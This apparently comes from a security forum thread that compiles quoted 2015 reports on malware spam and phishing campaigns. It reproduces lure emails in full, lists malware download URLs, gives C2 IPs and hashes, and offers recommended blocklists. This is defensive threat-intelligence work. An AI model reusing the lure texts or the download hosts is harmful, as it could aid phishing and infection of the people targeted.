- http://blog.mxlab.eu/2015/02/23/fake-email-regarding-delivery-attempt-by-fedex-contains-trojan/
Feb 23, 2015 - "... intercepted a new trojan distribution campaign by email with the subjects similar to:
Reese Torres agent Fedex
Dylan Livingstone agent Fedex
This email is sent from the spoofed address “Fedex <fedexservice@ juno .com>” and has the following body:
Dear Customer,
We tried to deliver your item on February 22th, 2014, 08:15 AM.
The delivery attempt failed because the address was business closed or nobody could sign for it.
To pick up the package,please, print the receipt that is attached to this email and visit Fedex location indicated in the invoice.
If the package is not picked up within 48 hours, it will be returned to the shipper.
Label/Receipt Number: 44364578782324455
Expected Delivery Date: February 22th, 2014
Class: International Package Service
Service(s): Delivery Confirmation
Status: Notification sent
Thank you
Copyright© 2015 FEDEX. All Rights Reserved...
The attached file Package.zip contains the 78 kB large file 443645787823424455.scr. The trojan is known as HEUR:Trojan.Win32.Generic or Win32.Trojan.Inject.Auto. At the time of writing, 5 of the 57 AV engines did detect the trojan at Virus Total*..."
* https://www.virustotal.com/en/file/09162dab1d254ad9fc583f165f554d57cd0205e129099ff102291ac4090cb23b/analysis/
... Behavioural information
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
___
7,038 new security vulnerabilities - 2014 stats
- http://www.gfi.com/blog/most-vulnerable-operating-systems-and-applications-in-2014/
Feb 18, 2015 - "... 7,038 -new- security vulnerabilities were added to the NVD database in 2014. This means an average of 19 new vulnerabilities per day. The number is significantly higher than in 2013 and continues the ascending trend over the past few years.
> http://www.gfi.com/blog/wp-content/uploads/2015/02/number-of-vulnerabilities-09-14.jpg
24% of these vulnerabilities are rated as high severity. The percentage is lower than in 2013, but the actual number of high security vulnerabilities has -increased- compared to last year.
> http://www.gfi.com/blog/wp-content/uploads/2015/02/high-severity-vulnerabilities.jpg
Third-party applications are the most important source of vulnerabilities with over 80% of the reported vulnerabilities in third-party applications. Operating systems are only responsible for 13% of vulnerabilities and hardware devices for 4%.
> http://www.gfi.com/blog/wp-content/uploads/2015/02/vulnerability-distribution-by-product-type.jpg
Top operating systems by vulnerabilities reported in 2014
> http://www.gfi.com/blog/wp-content/uploads/2015/02/OS-chart.jpg
Top applications by vulnerabilities reported in 2014
> http://www.gfi.com/blog/wp-content/uploads/2015/02/application-chart.jpg
... Not surprisingly at all, web browsers continue to have the most security vulnerabilities because they are a popular gateway to access a server and to spread malware on the clients. Adobe free products and Java are the main challengers but web browsers have continuously topped the table for the last six years. Mozilla Firefox had the most vulnerabilities reported in 2009 and 2012; Google Chrome in 2010 and 2011; Internet Explorer was at the top for the last two years.
To keep systems secure, it is -critical- that they are fully patched. IT admins should focus on (patch them first):
- Operating systems (Windows, Linux, OS X)
- Web browsers
- Java
- Adobe free products (Flash Player, Reader, Shockwave Player, AIR).
Vulnerability and patch management should be priority tasks for every sysadmin. Microsoft’s updates are -not- enough because third-party applications are just as problematic..."
:fear::fear: :mad:
AplusWebMaster
2015-02-25, 04:00
FYI...
Fake 'LogMeIn' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/02/malware-spam-your-logmein-pro-payment.html
25 Feb 2015 - "This -fake- financial email does not come from LogMeIn, instead it has a malicious attachment:
From: LogMeIn .com [no_reply@ logmein .com]
Date: 25 February 2015 at 08:52
Subject: Your LogMeIn Pro payment has been processed!
Dear client,
Thank you for purchasing our yearly plan for LogMeIn Pro on 25 computers.
Your credit card has been successfully charged.
Date : 25/2/2015
Amount : $999 ( you saved $749.75)
The transaction details can be found in the attached receipt.
Your computers will be automatically upgraded the next time you sign in.
Thank you for choosing LogMeIn!
Attached is a malicious Excel document called logmein_pro_receipt.xls with a VirusTotal detection rate of 0/56*. Usually in a spam run like this there are several different versions of the document but so far I have only seen one, containing this malicious macro. The macro downloads a file from:
http ://junidesign .de/js/bin.exe
This is saved as %TEMP%\GHjkdfg.exe and has a VirusTotal detection rate of 3/57**. Automated analysis tools... show this calling home to the following IPs:
92.63.87.13 (MTWV, Latvia)
86.104.134.156 (One Telecom, Moldova)
217.12.203.34 (ITL, Bulgaria)
108.61.165.19 (Choopa LLC, Netherlands)
5.196.241.196 (OVH, Ireland)
66.110.179.66 (Microtech Tel, US)
202.44.54.5 (World Internetwork Corporation, Thailand)
95.163.121.179 (Digital Networks aka DINETHOSTING, Russia)
59.97.137.171 (Broadband Multiplay, India)
78.140.164.160 (Webazilla, US)
107.181.174.104 (Colo at 55, US / UA Servers, Ukraine)
... The Malwr report shows that among other activities, this drops an executable that seems to be another version of itself [VT 3/57***] and a malicious DLL which is probably a Dridex component [VT 4/57****].
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
86.104.134.156
217.12.203.34
108.61.165.19
5.196.241.196
66.110.179.66
202.44.54.5
95.163.121.179
59.97.137.171
78.140.164.160
107.181.174.104 "
* https://www.virustotal.com/en/file/2036453918e928f3a1931c5554c2e0167bd2fce399f76f090e4ba3bd2bedd72f/analysis/1424856686/
** https://www.virustotal.com/en/file/18bd732ba09803deafc175a689e14341b90debc723c57b9908853c261e4e8104/analysis/1424856906/
*** https://www.virustotal.com/en/file/e882695509007f04c5a3df99184d3e7b8b28734eb15afb8a376a15d58ee25369/analysis/1424858127/
**** https://www.virustotal.com/en/file/9cc83358ac8b7f1e6b80082cd4041e2291f8cdbd233754f26213e069480274bb/analysis/1424858199/
- http://myonlinesecurity.co.uk/your-logmein-pro-payment-has-been-processed-word-doc-or-excel-spreadsheet-malware/
25 Feb 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Your-LogMeIn-Pro-payment-has-been-processed.png
Fake emails mimic LogMeIn receipts
- http://blog.logmein.com/products/phishing-alert-fake-emails-mimic-logmein-receipts
Feb 17, 2015
___
Copy .com used to distribute Crypto Ransomware
- https://isc.sans.edu/diary.html?storyid=19371
2015-02-25 01:04:23 UTC - "Thanks to Marco for sending us a sample of yet another piece of crypto-ransom malware. The file was retrieved after visiting a compromised site (www .my-sda24 .com) . Interestingly, the malware itself was stored on copy .com. Copy .com is a cloud based file sharing service targeting corporate users. It is run by Barracuda, a company also known for its e-mail and web filtering products that protect users from just such malware. To its credit, Barracuda removed the malware within minutes of Marco finding it. At least right now, detection for this sample is not great. According to Virustotal, 8 out of 57 virus engines identify the file as malicious [1]. A URL blacklist approach may identify the original site as malicious, but copy .com is unlikely to be blocked. It has become very popular for miscreants to store malicious files on cloud services, in particular if they offer free trial accounts. Not all of them are as fast as Barracuda in removing these files."
1] https://www.virustotal.com/en/file/1473d1688a73b47d1a08dd591ffc5b5591860e3deb79a47aa35e987b2956adf4/analysis/
146.185.221.150: https://www.virustotal.com/en/ip-address/146.185.221.150/information/
___
Dropbox SPAM - malware
- http://blog.dynamoo.com/2015/02/malware-spam-info-chemicals-shared-mt.html
25 Feb 2015 - "This spam leads to a malware download via Dropbox.
From: Info via Dropbox
Reply-To: hcm0366@ gmail .com
Date: 25 February 2015 at 05:38
Subject: Info Chemicals shared "MT 103_PO_NO!014.zip" with you
Signed by: dropbox .com
From Info:
"Good day ,
How are you today
pls check attached, my manager had requested I email you our new order details together with TT copy of balance payment. Kindly confirm in return.
regards,
Frank Manner
Broad Oak Ltd, Tiverton, Tiverton Way, Tiverton Business Park, Tiverton, Devon, EX16 6TG
Registered No. 1971053 England & Wales...
The email has been digitally signed by Dropbox (which means exactly nothing) and is -spoofing- the wholly legitimate Broad Oak Ltd who have been a target of this sort of thing several times before. In this case, the link in the email goes to:
https ://www .dropbox .com/l/dFxVxjuDRo3j2oANVURy2v
and then to
https ://www .dropbox .com/s/fnsprei93c45ts6/MT%20103_PO_NO!014.zip
Which leads to a malicious EXE file called MT 103_PO_NO!014.zip. Inside that is the malware itself, a file .pdf.scr which has a detection rate of 11/57*. According to the Malwr report it drops another executable with a detection rate of 9/57**. The payload looks similar to the Zeus trojan. Also, according to Malwr and ThreatExpertit attempts to communicate with an apparent web-to-Tor gateway at
mmc65z4xsgbcbazl .onion .am
onion .am is hosted on 37.220.35.39 (YISP Colo, Netherlands)... Be aware that there are probably many other Dropbox locations in use for this spam run. If you see more, I suggest you forward the email to abuse -at- dropbox.com ..."
* https://www.virustotal.com/en/file/ed7d56bf1e579bdaac0ba2d4f1c5be18256f58f2acf667c2a82a3f62341aca76/analysis/1424849825/
** https://www.virustotal.com/en/file/923b35b4e8744e47fa9e8f3cf93a6aeaccc148332a68a8325a7f4462ccf7ff4f/analysis/1424850664/
___
Fake 'eFax message' SPAM - malware
- http://myonlinesecurity.co.uk/efax-message-from-pots-modem-2-1-pages-caller-id-1-630-226-2563-fake-pdf-malware/
25 Feb 2015 - "'eFax message from “POTS modem 2 ” – 1 page(s), Caller-ID: 1-630-226-2563' pretending to come from message@ inbound .efax .com with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/eFax-message-from-POTS-modem-2.png
25 February 2015 : fax_2342.zip: Extracts to:fax_2342.exe
Current Virus total detections: 19/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c4556b57ff046c56cf8a53f55bd825570882444b284589547f688b98bf1adbc9/analysis/1424883423/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
188.65.112.97: https://www.virustotal.com/en/ip-address/188.65.112.97/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
UDP communications
77.72.169.166: https://www.virustotal.com/en/ip-address/77.72.169.166/information/
77.72.169.167: https://www.virustotal.com/en/ip-address/77.72.169.167/information/
:fear::fear: :mad:
AplusWebMaster
2015-02-26, 14:40
FYI...
cPanel ‘Account Suspended’ PHISH serves exploits
- https://blog.malwarebytes.org/exploits-2/2015/02/deceiving-cpanel-account-suspended-page-serves-exploits/
Feb 26, 2015 - "cPanel is one of the most popular web hosting control panels out there. It allows administrators to manage their website(s) using a graphical front end, perform maintenance and review important logs among other things. cPanel also has a user interface for CGI (short for Common Gateway Interface) typically used to run scripts and generate dynamic content. One such script populates a fairly well-known (and somewhat dreaded) page known as the “Account Suspended” page:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/suspended1.png
Visitors to a site are -redirected- to this screen for one of many reasons ranging from the site owner’s failure to pay for his hosting, violating the Terms and Conditions, or perhaps exceeding their allocated bandwidth... The page itself is made of HTML code, and can be edited by an administrator, often via a Web Host Manager (WHM). Many sites that were once used to distribute malware and have been suspended will sport that kind of page. One would assume that the site would now be harmless, since the hosting provider has already taken action. If you aren’t looking at the URL carefully (the suspended page should be displayed at the root of the domain) and assumed so, you might just run into a case where the site is actually fully compromised and still active... The injected iframe redirects straight to a Fiesta exploit kit landing page. The landing page usually performs various checks and prepares the exploits that are going to get fired at the victim. As is often the case with exploit kits, that page is heavily obfuscated to make identification a little bit more difficult... This case is a reminder not to trust a book by its cover and always exercise caution. Attackers were clever to hide the malicious redirect code where they did because they might trick someone into brushing off the site as “already terminated by the hosting provider”, when in fact it’s not. They might have fooled some, but they didn’t fool us..."
(More detail at the malwarebytes URL at the top.)
___
Fake 'Voice Message' SPAM - wav malware
- http://myonlinesecurity.co.uk/ring-central-new-voice-message-from-no-caller-id-on-25022015-at-1625-fake-wav-malware/
26 Feb 2015 - "'New Voice Message from No Caller ID on 25/02/2015 at 16:25' pretending to come from notify-uk@ ringcentral .com with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/ring-central-voice-message.png
26 February 2015: NoCallerID-1218-162550-153.wav.zip:
Extracts to: NoCallerID-1218-162550-1536.wav.exe
Current Virus total detections: 0/57* . The extracted file name is actually NoCallerID-1218-162550-153б.wav.exe (if you look closely, you can see that the 6 is not the number six at all but a foreign language character that looks like a number 6) This can cause analysis problems with some of the auto analysers which have crashed trying to analyse this one and an error on some windows systems, possibly leading to the file auto-running. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper wav (voice or music) file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/843c890b197dc780ea7b3c85688b6b11f8594083d2de055dce21fd1427ec0379/analysis/1424938264/
... Behavioural information
TCP connections
81.177.139.53: https://www.virustotal.com/en/ip-address/81.177.139.53/information/
95.211.144.65: https://www.virustotal.com/en/ip-address/95.211.144.65/information/
92.63.87.13: https://www.virustotal.com/en/ip-address/92.63.87.13/information/
80.150.6.138: https://www.virustotal.com/en/ip-address/80.150.6.138/information/
UDP communications
134.170.185.211: https://www.virustotal.com/en/ip-address/134.170.185.211/information/
___
Fake 'Copy Invoices' SPAM - malicious attachment
- http://blog.dynamoo.com/2015/02/malware-spam-chris-christou.html
26 Feb 2015 - "This -fake- invoice spam comes with a malicious attachment:
From: Chris Christou [chris.christou@ greysimmonds .co.uk]
Date: 26 February 2015 at 10:45
Subject: Copy invoices
Hello ,
Please find copy invoices attached as per our telephone conversation.
Kind regards,
Chris
Chris Christou
Credit Control
Grey Simmonds
Cranes Point
Gardiners Lane South
Basildon
Essex SS14 3AP
Tel: 0845 130 9070
Fax: 0845 370 9071...
It does -NOT- come from Grey Simmons, nor have their systems been compromised in any way. Instead, this is a simple forgery. I have only seen one sample so far, with an attachment IGM135809.doc [detection rate 0/57*] which contains this malicious macro... which downloads a further component from:
http ://xomma .net/js/bin.exe
This is saved as %TEMP%\GVhjJJVJH.exe and has a VirusTotal detection rate of 4/56**. Automated analysis tools... show it attempting to phone home to the following IPs:
92.63.87.13 (MWTV, Latvia)
78.140.164.160 (Webazilla, US)
86.104.134.156 (One Telecom, Moldova)
104.232.32.119 (Net 3, US)
This Malwr report shows dropped files with an MD5 of 590fc032ac747d970eb8818671f2bbd3 [VT 3/57***] and 1997b0031ad702c8347267db0ae65539 [VT 4/57****].
Recommended blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
78.140.164.160
86.104.134.156
104.232.32.119 "
* https://www.virustotal.com/en/file/73d0d60b84393ffbc09a94230384772ec688ff2c39a2a4de58ff705b2aa55e50/analysis/1424948249/
** https://www.virustotal.com/en/file/c56a46575f00e527844ea393c50aa58500dda94088c34489559b610200ba756b/analysis/1424948263/
*** https://www.virustotal.com/en/file/450c7642a35a6723a77c52cd37e3825662f3888ab8fcaa779f66bc557175553d/analysis/
**** https://www.virustotal.com/en/file/740d36c784a7d914f3bbee3e45e97c4c90346236ffce8fadf3fd3c881a8faccb/analysis/
- http://myonlinesecurity.co.uk/chris-christou-grey-simmonds-copy-invoices-word-doc-or-excel-xls-spreadsheet-malware/
26 Feb 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Grey-Simmonds-Copy-invoices.png
___
Fake email SPAM - malware attached
- http://myonlinesecurity.co.uk/nicolar-jhs-co-uk-ra-069767-fake-pdf-malware/
26 Feb 2015 - "'NicolaR RA 069767 (random numbers)' pretending to come from NicolaR@ jhs. co.uk with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/RA-069767.png
26 February 2015: RA_New.zip: Extracts to: RA_New.exe
Current Virus total detections: 2/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/29a6cca9ecf3007adfcc6a8e18d846630afd0b7a6636660bd26800f0a499ee3e/analysis/1424955113/
___
Fake 'Sales Invoice' SPAM – PDF malware
- http://myonlinesecurity.co.uk/worldwind-co-uk-your-sales-invoice-fake-pdf-malware/
26 Feb 2015 - "'Your Sales Invoice' pretending to come from donotreply@ worldwind .co.uk with a zip attachment is another one from the current bot runs... The email looks like:
Your document is attached with our regards.
The document is in PDF format and requires Adobe Reader to view ...
26 February 2015: 131234.zip: Extracts to: 131234.exe
Current Virus total detections: 7/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/f9a4c6e5f2bac899b95772bb1b380b4a6f376c71b6c14385aa9154197e1a677d/analysis/1424964940/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
89.248.61.60: https://www.virustotal.com/en/ip-address/89.248.61.60/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
UDP communications
217.10.68.152: https://www.virustotal.com/en/ip-address/217.10.68.152/information/
217.116.122.136: https://www.virustotal.com/en/ip-address/217.116.122.136/information/
:fear::fear: :mad:
AplusWebMaster
2015-02-27, 14:36
FYI...
Bogus Search Engine leads to Exploits
- https://blog.malwarebytes.org/online-security/2015/02/bogus-search-engine-leads-to-exploits/
Feb 27, 2015 - "... Sadly, devious software makers are using all the tricks in the books to fool users into installing their programs. Even when you take all the precautions necessary and never download anything from an untrusted source, you could still end up with Adware. The recent Lenovo/Superfish fiasco is a good example of that. Brand new computers were pre-installed with Adware that surreptitiously injected ads into the browser by introducing vulnerabilities, in an almost undetectable way. Adware is not only annoying but can also weaken a computer’s security status. Today, we have another case to prove that point. Potentially Unwanted Programs often install a search assistant (or rather a browser and search -hijacker-) on people’s machines:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/webfindfast2.png
The idea is simple: To redirect people’s searches to affiliates or other sponsors and earn pay-per-click commissions. This one is hosted at webfindfast .com*:
> https://blog.malwarebytes.org/wp-content/uploads/2015/02/searches.png
For the end-user, the search experience is simply terrible but yet not the end of their troubles. In this case, clicking on any link results in a -redirection- to an exploit kit landing page, quickly followed by malware... As usual, after several convoluted redirects, the user ends up on the door step of the famous Angler exploit kit... Vulnerable computers are infected with a piece of malware detected as Trojan.Crypt.NKN by Malwarebytes Anti-Malware. It will install a rogue Antivirus program known as 'Malware Defender 2015' and pull up a purchase page from an IP address located in Istanbul (176.53.125.20)**... The lesson to learn from this is to once again stay away from bundled software and other programs that appear to be free but come with a catch. Also, if you’re starting to see a different home page or search engine than you used to, you should make sure your browser has not been altered in some way."
* 136.243.24.248: https://www.virustotal.com/en/ip-address/136.243.24.248/information/
** 176.53.125.20: https://www.virustotal.com/en/ip-address/176.53.125.20/information/
___
Fake 'Invoice' SPAM - doc malware
- http://blog.dynamoo.com/2015/02/malware-spam-dennys-invoice-inv650988.html
27 Feb 2015 - "This -fake- invoice email is not from Dennys but is a simple forgery with a malicious attachment. Dennys are not sending the spam, and their systems have not been compromised in any way.
From: accounts@ dennys .co.uk
Date: 27 February 2015 at 09:14
Subject: Dennys Invoice INV650988
To view the attached document, you will need the Microsoft Word installed on your system.
So far I have only seen a single sample, with an attachment INV650988.doc which has a VirusTotal detection rate of exactly zero*. This contains this malicious macro... which downloads another component from the following location:
http ://hew.homepage.t-online. de/js/bin.exe
This is saved as %TEMP%\324235235.exe and has a VirusTotal detection rate of 1/57**.
According to the Malwr report, this executable then goes on and downloads another version of itself and a config file from:
http ://apartmentprofile .su/conlib.php
http ://paczuje.cba .pl/java/bin.exe
It drops several files, KB2896~1.EXE [VT 3/57***], edg2.exe [VT 3/57****] and a Dridex DLL which is much more widely detected (and we saw this same DLL yesterday)... Between the Malwr and VirusTotal analyses, we see attempts to communicate with the following IPs:
198.52.200.15 (Centarra Networks, US)
95.211.144.65 (Leaseweb, Netherlands)
195.114.0.64 (SuperHost.pl, Poland)
92.63.87.13 (MWTV, Latvia)
78.140.164.160 (Webazilla, US)
59.97.137.171 (Broadband Multiplay Project, India)
104.232.32.119 (Net 3, US)
Some of these are shared hosting, I recommend for maximum protection that you apply the following blocklist:
92.63.82.0/23
92.63.84.0/22
92.63.88.0/24
198.52.200.15
78.140.164.160
59.97.137.171
104.232.32.119 "
* https://www.virustotal.com/en/file/42efc98ed3f157b3a607a768e49f00f28a5f3eaeac167b9f7007a5510e3d8aec/analysis/1425029078/
** https://www.virustotal.com/en/file/06cceb310e667e143dbb938f41123a90eb82719e273e9e9c436f8bdebebdaa85/analysis/1425029464/
*** https://www.virustotal.com/en/file/d5269645293e4b5d6eba8aa74bad10776dfc960d16b3768398b02ee342e35b09/analysis/1425031075/
**** https://www.virustotal.com/en/file/affde7d8451393edd88a2cd926379993dd5fc853c6c0395fa7d20495836d828a/analysis/1425031099/
- http://myonlinesecurity.co.uk/dennys-invoice-inv650988-word-doc-or-excel-xls-spreadsheet-malware/
27 Feb 2015
> https://www.virustotal.com/en/file/42efc98ed3f157b3a607a768e49f00f28a5f3eaeac167b9f7007a5510e3d8aec/analysis/1425027918/
___
Fake 'Offer Sheet' SPAM – PDF malware
- http://myonlinesecurity.co.uk/pearl-summer-offer-sheet-fake-pdf-malware/
27 Feb 2015 - "'Pearl Summer Offer Sheet' pretending to come from maikel.theunissen@ pearleurope .com with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/Pearl-Summer-Offer-Sheet.png
27 February 2015: Pearl UK Summer Offer Sheet 2015.zip: Extracts to: Pearl UK Summer Offer Sheet 2015.exe
Current Virus total detections: 0/57* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/7f8dd1fd3e0d4cae2ddca058eb71015a608bed1486977ac178c5c3b2cf8c3668/analysis/1425039221/
... Behavioural information
TCP connections
216.146.43.70: https://www.virustotal.com/en/ip-address/216.146.43.70/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
192.185.86.160: https://www.virustotal.com/en/ip-address/192.185.86.160/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
UDP communications
107.23.150.92: https://www.virustotal.com/en/ip-address/107.23.150.92/information/
107.23.150.99: https://www.virustotal.com/en/ip-address/107.23.150.99/information/
___
Fake 'eFax message' SPAM – PDF malware
- http://myonlinesecurity.co.uk/efax-message-from-unknown-1-pages-caller-id-1-219-972-8538-fake-pdf-malware/
27 Feb 2015 - "'eFax message from “unknown” – 1 page(s), Caller-ID: 1-219-972-8538' pretending to come from message@ inbound .efax .com with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/02/eFax-message-from-unknown-1024x610.png
27 February 2015: FAX_20150226_1424989043_176.zip: Extracts to: FAX_20150226_1424989043_176.exe
Current Virus total detections: 4/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/de32206ccde1b20a944c5ac4c49a565d9d65ba4786bacc37aa18c2ca7d83b39f/analysis/1425056870/
... Behavioural information
TCP connections
91.198.22.70: https://www.virustotal.com/en/ip-address/91.198.22.70/information/
181.189.152.131: https://www.virustotal.com/en/ip-address/181.189.152.131/information/
192.185.106.103: https://www.virustotal.com/en/ip-address/192.185.106.103/information/
UDP communications
217.10.68.152: https://www.virustotal.com/en/ip-address/217.10.68.152/information/
:fear::fear: :mad:
AplusWebMaster
2015-03-01, 19:03
FYI...
Fake 'Order/ Payment' SPAM – Java malware
- http://myonlinesecurity.co.uk/lucy-c-ulngaro-new-order-payment-java-malware/
1 Mar 2015 - "'lucy C Ulngaro New Order/ Payment' pretending to come from Admin <tareq@ msp .com.sa> with a jar attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/New-Order-Payment.png
1 March 2015: PO-2015-0123.jar: Current Virus total detections: 22/57*
This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a zip file instead of the java file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/4aa073892196a1b29af98f3006379bcfc13b82d46bf1cb4477eed7173283f0ad/analysis/1425193109/
___
Fake job offer SPAM
- http://blog.dynamoo.com/2015/02/fake-job-offer-tradeconstructioncouk.html
28 Feb 2015 - "This -fake- job offer claimed to be from a UK-based company called Trade Construction Company LLC using a website at tradeconstruction .co .uk. However, no such company exists in the UK, and this is a rip-off of a wholly legitimate US firm that is actually called Trade Construction Company LLC who are -not- involved in this scam at all.
From: JOB ALERT [klakogroups@ gmail .com]
Reply-To: klakogroups@ gmail .com
To: Recipients [klakogroups@ gmail .com]
Date: 27 February 2015 at 18:37
Subject: NEW JOB VACANCIES IN LONDON.
Trade Construction Company,
L.L.C,
70 Gracechurch Street.
EC3V 0XL, London. UK
We require the services of devoted and hardworking workers, who are ready to work after undergoing enlistment training. in all sectors
as The Trade Construction Company Management intends to increase its man power base due to increasing number of customers and contract in the Company.
Available Positions...
... The tradeconstruction .co.uk site is almost a bit-by-bit copy of the genuine tradeconstruction .com website.
> https://4.bp.blogspot.com/-SqBEq8BOcCk/VPGUfPry6_I/AAAAAAAAGSg/hRxzkJeNGpU/s1600/tradeconstruction1.jpg
... Nothing about this job offer is legitimate. It does -not- come from who it appears to come from and should be considered to be a -scam- and avoided."
:fear: :mad:
AplusWebMaster
2015-03-02, 21:52
FYI...
Fake 'Secure Message' SPAM – PDF malware
- http://myonlinesecurity.co.uk/jp-morgan-access-secure-message-fake-pdf-malware/
2 Mar 2015 - "'JP Morgan Access Secure Message' pretending to come from JP Morgan Access <service@ jpmorgan .com> with a zip attachment is another one from the current bot runs... The email looks like:
Please check attached file(s) for your latest account documents regarding your online account.
Forrest Blackwell
Level III Account Management Officer
817-140-6313 office
817-663-8851 cell
Forrest .Blackwell@ jpmorgan .com
Investments in securities and insurance products are:
NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
2015 JPMorgan Chase & Co...
2 March 2015: JP Morgan Access – Secure.zip : Extracts to: JP Morgan Access – Secure.scr
Current Virus total detections: 9/57** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2e6326d840a7656321ea9a946efb2a57f15ab6cf3b07a668e8a14bb56229150e/analysis/1425314842/
:fear: :mad:
AplusWebMaster
2015-03-03, 15:32
FYI...
Fake 'Apple ID' – phish...
- http://myonlinesecurity.co.uk/your-recent-download-with-your-apple-id-phishing/
2 Mar 2015 - "'Your recent download with your Apple ID' pretending to come from Apple iTunes <orders@ tunes .co.uk> is one of the latest -phish- attempts to steal your Apple Account and your Bank, credit card and personal details. This one only wants your personal details, Apple log in details and your credit card and bank details... This one has a short url link in the email which -redirects- you...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Your-recent-download-with-your-Apple-ID.png
If you follow-the-link (don't) you see a webpage looking like:
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/verify_apple_ID.png
... fill in your user name and password you get a page looking very similar to this one (split into sections), where the phishers try to validate your details to make sure that you are entering “genuine” information. They make sure that the bank account numbers have the correct number of digits and that the credit card numbers have the correct number of digits and format.
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/verify_apple_ID_2.png
...
> http://myonlinesecurity.co.uk/wp-content/uploads/2015/01/verify_apple_ID_3.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email..."
___
Fraud Alert: Unauthorised Appstore Payment – phish
- http://myonlinesecurity.co.uk/fraud-alert-unauthorised-appstore-payment-phishing/
3 Mar 2015 - "Fraud Alert: Unauthorised Appstore Payment' pretending to come from iTunes <datacareapsecurity@ apple. co.uk> is one of the latest -phish- attempts to steal your Apple Account and your Bank, credit card and personal details...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/03/Fraud-Alert-Unauthorised-Appstore-Payment.png
All of these emails use Social engineering tricks to persuade you to open the attachments that come with the email...:
___
Worm.Gazon: Want Gift Card? Get Malware
- http://www.adaptivemobile.com/blog/worm-gazon-want-gift-card-get-malware
2 Mar 2015 - "... A simple piece of -malware- is on the way to become one of the 'spammiest' mobile malware outbreaks seen yet. This malware we have dubbed Gazon spreads via SMS with a shortened link to itself in the spam message, redirecting a potential victim to a webpage that promises an Amazon gift card if you install an APK file hosted on the page:
Hey [NAME], I am sending you $200 Amazon Gift Card You can Claim it here : https ://bit .ly/ getAmazon[redactedD]
> http://www.adaptivemobile.com/images/blog-uploads/gazon-download.jpg
The malware passes itself as an app that gives Amazon rewards. However, the only thing it actually does is pulling up a scam page inside the app which asks you to participate in the -survey- ... Each of the options below ends up taking you to either another scam page or asks you to download a game in the Google Play. While you are busy clicking through pages the author just earns money through your clicks as we have seen in other pieces of mobile malware.
> http://www.adaptivemobile.com/images/blog-uploads/gazon-scam1.png
However, in the background this malware harvests all your contacts and sends a -spam- message to each of them with the URL pointing to the body of the worm... Thousands of people have seemingly installed this malware and been a victim. We are seeing over 4k infected devices in all of the major networks in North America, and we've blocked over 200k spam messages generated by these infected devices. Stopping the spread via messaging is critical as each one of these messages was an attempt to spread the app to an infected user's contacts. Based on click-throughs from the shortened URL it also seems this malware has been encountered in multiple other countries as well, worldwide. At the moment none of the AV engines detect this malware according to VirusTotal.
> http://www.adaptivemobile.com/images/blog-uploads/gazon-virustotal.png
... users should be aware of this -scam- and as always, be careful clicking on links in text messages that seem suspect. In this case, like other worm malware we have seen recently, even messages your contacts send you may not be safe. The malware can be removed using standard Android app uninstall utilities..."
:fear: :mad:
AplusWebMaster
2015-03-04, 14:03
FYI...
Fake no body text SPAM - malicious attachment
- http://blog.dynamoo.com/2015/03/malware-spam-john-donald.html
4 Mar 2015 - "This rather terse email comes with a malicious attachment:
From: John Donald [john@ kingfishermanagement .uk .com]
Date: 4 March 2015 at 09:09
Subject: Document1
